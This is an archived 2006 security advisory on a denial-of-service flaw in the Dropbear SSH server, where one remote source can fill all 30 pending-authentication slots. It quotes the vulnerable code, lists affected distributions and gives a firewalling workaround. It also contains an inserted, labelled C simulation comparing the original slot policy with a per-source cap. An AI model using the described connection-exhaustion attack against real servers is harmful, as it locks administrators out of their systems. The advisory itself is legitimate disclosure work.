Dropbear SSH server Denial of Service
Subject: Dropbear SSH server Denial of Service
From: Pablo Fernandez <pablo@littleQ.net>
To: [email protected], [email protected]
Date: Tue, 07 Mar 2006 19:47:57 +0000
Message-Id: <1141760877.12514.2.camel@localhost.localdomain>



Dropbear SSH server Denial of Service

Credits: Pablo Fernandez
March 7th, 2006

I. BACKGROUND

Dropbear is a relatively small SSH 2 server and client. It runs on a
variety of POSIX-based platforms. Dropbear is open source software,
distributed under a MIT-style license. Dropbear is particularly useful
for "embedded"-type Linux (or other Unix) systems, such as wireless
routers.

More information is available at
http://matt.ucc.asn.au/dropbear/dropbear.html

II. DESCRIPTION

Denial of service is possible and could be trivially launched by a remote
attacker.

The vulnerability specifically exists due to a design error in the
authorization-pending connections code. By default, and as a #define of
the MAX_UNAUTH_CLIENTS constant, the SSH server allows 30
authorization-pending connections; from connection 31 onwards, incoming
sockets are close()d immediately.

The vulnerable code is in svr-main.c:

/* check for max number of connections not authorised */
for (j = 0; j < MAX_UNAUTH_CLIENTS; j++) {
        if (childpipes[j] < 0) {
                break;
        }
}

if (j == MAX_UNAUTH_CLIENTS) {
        /* no free connections */
        /* TODO - possibly log, though this would be an easy way
         * to fill logs/disk */
        close(childsock);
        continue;
}
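
As an added illustration (not code from the advisory or from Dropbear itself), the following C model reproduces the slot search above on a table standing in for childpipes[] and places beside it a hardened allocator that additionally caps pending connections per source address. It then runs the scenario the advisory describes: one source leaves many connections pending and the administrator tries to connect afterwards. The global cap of 30 is the page's; MAX_UNAUTH_PER_IP and its value of 5, the slot_table structure and the scenario functions are assumptions of this model, not Dropbear identifiers.

```c
#include <stdio.h>

/* Dropbear's default cap on authorization-pending children (from the advisory). */
#define MAX_UNAUTH_CLIENTS 30
/* Per-source cap used by the hardened policy: a value assumed for this model. */
#define MAX_UNAUTH_PER_IP 5

/* Slot table modelled on childpipes[]: one entry per pending child.
 * -1 means free; otherwise the entry holds an id standing in for the peer address. */
struct slot_table {
    int src[MAX_UNAUTH_CLIENTS];
};

typedef int (*accept_policy)(struct slot_table *, int);

void table_init(struct slot_table *t)
{
    for (int j = 0; j < MAX_UNAUTH_CLIENTS; j++)
        t->src[j] = -1;
}

/* How many pending slots one source currently holds. */
int count_from_source(const struct slot_table *t, int src)
{
    int n = 0;
    for (int j = 0; j < MAX_UNAUTH_CLIENTS; j++)
        if (t->src[j] == src)
            n++;
    return n;
}

/* Vulnerable policy: the same search as svr-main.c, keyed on the global
 * count only. Returns the slot index, or -1 when the socket would be close()d. */
int accept_global_only(struct slot_table *t, int src)
{
    int j;
    for (j = 0; j < MAX_UNAUTH_CLIENTS; j++)
        if (t->src[j] < 0)
            break;
    if (j == MAX_UNAUTH_CLIENTS)
        return -1;              /* no free connections */
    t->src[j] = src;
    return j;
}

/* Hardened policy: refuse a source that already holds MAX_UNAUTH_PER_IP
 * pending slots, so a single address cannot consume the whole table. */
int accept_per_source_cap(struct slot_table *t, int src)
{
    if (count_from_source(t, src) >= MAX_UNAUTH_PER_IP)
        return -1;
    return accept_global_only(t, src);
}

/* Scenario: source 1 opens flood_count connections and never authenticates;
 * then source 2 (the administrator) tries once. Returns 1 if the admin gets
 * a slot, 0 if the admin's socket would be closed. */
int admin_can_connect(accept_policy policy, int flood_count)
{
    struct slot_table t;
    table_init(&t);
    for (int i = 0; i < flood_count; i++)
        policy(&t, 1);
    return policy(&t, 2) >= 0;
}

/* Slots held by the flooding source after the same scenario. */
int flood_slots_held(accept_policy policy, int flood_count)
{
    struct slot_table t;
    table_init(&t);
    for (int i = 0; i < flood_count; i++)
        policy(&t, 1);
    return count_from_source(&t, 1);
}

int main(void)
{
    printf("global cap only: admin admitted after 31 pending = %d, flooder holds %d slots\n",
           admin_can_connect(accept_global_only, 31),
           flood_slots_held(accept_global_only, 31));
    printf("per-source cap : admin admitted after 31 pending = %d, flooder holds %d slots\n",
           admin_can_connect(accept_per_source_cap, 31),
           flood_slots_held(accept_per_source_cap, 31));
    return 0;
}
```

With the global cap alone, the 30 slots all end up held by the single pending source and the administrator is refused; with the per-source cap the same source is limited to 5 slots and the administrator still gets in. A per-source cap only narrows the problem, though: six addresses each holding five pending connections still fill the table, which is why the advisory's workaround of accepting SSH connections only from trusted sources remains the stronger control.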

III. ANALYSIS

Remote attack of this vulnerability is trivial. This is especially
problematic if the administrator can't log in due to the attack and
therefore can't blacklist the attacker, restart the service or take
other action.

IV. DETECTION

All versions (up to and including the current 0.47 version) are vulnerable.

The following distributions are known to use or package Dropbear:

      * LEAF Bering uClibc - a small Linux firewall/network appliance
        distribution.
      * NetBSD Packages Collection
      * Debian
      * FreeBSD Ports
      * Gentoo Packages
      * OpenWRT - a very nice distro for WRT54G wireless routers (and
        others).
      * FREESCO is a single floppy NAT/firewall router/server.
      * Bent Linux - a uClibc based Linux distribution, statically
        linked cpio.bz2 packages (should work on any distro)
      * fli4l - a one-disk-router Linux distribution
      * OpenZaurus - custom Linux for the Sharp Zaurus
      * floppyfw - a single floppy firewall Linux distribution
      * ttylinux - Linux to fit in 4 megabytes of disk space and run on
        386es, as an internet terminal
      * Sisela - single floppy Linux router/wireless AP distro
      * gumstix - tiny embedded Linux boards
      * OpenSimpad - Linux for the Siemens SIMpad, packages here
        upgrade for Linksys WiFi routers
      * Slackmatic
      * Coyote Linux - a single floppy firewall
      * Trinux - a lightweight Linux security toolkit
      * Familiar ipkg - for handhelds
      * Source Mage - a distribution of GNU/Linux, Dropbear is available
        as a spell.
      * Netcomm NB5 ADSL router - this runs Dropbear out of the box.
      * Dreambox linux-based DVB recorder has Dropbear on the default
        firmware.
      * kboot - a proof-of-concept Linux boot loader.


V. WORKAROUND

Administrators running Dropbear should wait for a fix from the vendor.
In the meantime, firewalling the SSH server so that incoming
connections are accepted only from trusted sources is advised.

VI. VENDOR RESPONSE

The vendor has been notified and a solution is under development.

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

30/01/2006  Initial vendor notification
07/03/2006  Public disclosure

IX. CREDIT

Pablo Fernandez <pablo at littleQ.net> is credited with this discovery.

-- 
Pablo Fernandez Lopez
http://www.littleQ.net/

GPG: http://www.littleQ.net/pablo.asc
Fingerprint: 14A0 8343 E8FB E940 59E3  F7BB C347 869D DBB9 337F

[Attachment: dropbear-PoC.c (not included in this archive copy)]
